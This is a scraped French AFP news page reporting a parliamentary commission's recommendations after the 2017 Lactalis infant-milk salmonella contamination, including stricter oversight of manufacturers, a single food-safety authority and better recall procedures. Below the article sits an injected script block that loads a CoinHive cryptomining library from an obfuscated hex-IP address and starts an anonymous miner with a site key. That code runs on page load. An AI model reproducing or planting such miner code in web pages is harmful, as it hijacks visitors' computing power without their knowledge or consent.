France : après l'affaire Lactalis, appel à un meilleur contrôle des industriels
0
 

Écouter
France : après l'affaire Lactalis, appel à un meilleur contrôle des industriels

France : après l'affaire Lactalis, appel à un meilleur contrôle des industriels

AFP | Lu 740 fois | Publié Il y a 31 jour(s)

Une commission d'enquête parlementaire en France réclame un meilleur contrôle des industriels, un interlocuteur unique pour les crises sanitaires et une révision des procédures de retrait/rappel dans son rapport sur la contamination de laits infantiles Lactalis présenté mercredi.

Fin 2017, 36 nourrissons ont été atteints de salmonellose après avoir consommé un produit pour enfant fabriqué dans une usine de l'ouest du pays par le géant français du lait qui exporte ses produits dans de nombreux pays.

Le processus de retrait a été chaotique et de nombreux dysfonctionnements ayant mené à la contamination ont été mis au jour, ce qui a donné lieu à l'ouverture d'une enquête judiciaire et à la création de la commission d'enquête parlementaire, qui devait rendre publique ses préconisations dans l'après-midi.

Son président Christian Hutin a d'ores et déjà dévoilé les principales lors d'un entretien sur la radio Europe 1. Pour éviter les problèmes sanitaires dans l'industrie agroalimentaire, "l'auto-contrôle n'est pas suffisant", a-t-il déclaré, assurant qu'il faut "contrôler les contrôleurs, et contrôler les contrôlés".

La commission va ainsi préconiser de "toucher au portefeuille" les industriels qui "ne respecteront pas une forme de déontologie et de rigueur sur les autocontrôles", selon le député, qui évoque aussi "une forme de responsabilité pénale".

D'après M. Hutin, la commission va aussi demander à ce que l'Etat mette fin à la "guerre des polices" et crée une autorité unique dans le domaine de la sécurité alimentaire, dénonçant une "armée mexicaine" avec "trois ministères: la Santé, Bercy et Agriculture, c'est pas possible".

Concernant la procédure de retrait/rappel, qui s'était avérée défaillante durant la crise Lactalis, M. Hutin a évoqué plusieurs pistes: des "crash-test" comme pour les banques, l'utilisation des codes barres et des QR codes pour faciliter les blocages à la caisse, et la formation du personnel. Il demande également qu'un employé par magasin "soit responsable de la santé publique".

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Inde : plus de 320 morts dans des inondations, nouvelles pluies

Pologne: trois morts et 38 blessés dans l'accident d'un bus ukrainien

Mali: manifestation de l'opposition contre la réélection du président Keïta

Venezuela : La justice valide la demande d'extradition de l'ex-procureure générale

Venezuela : Maduro annonce la multiplication par 34 du salaire minimum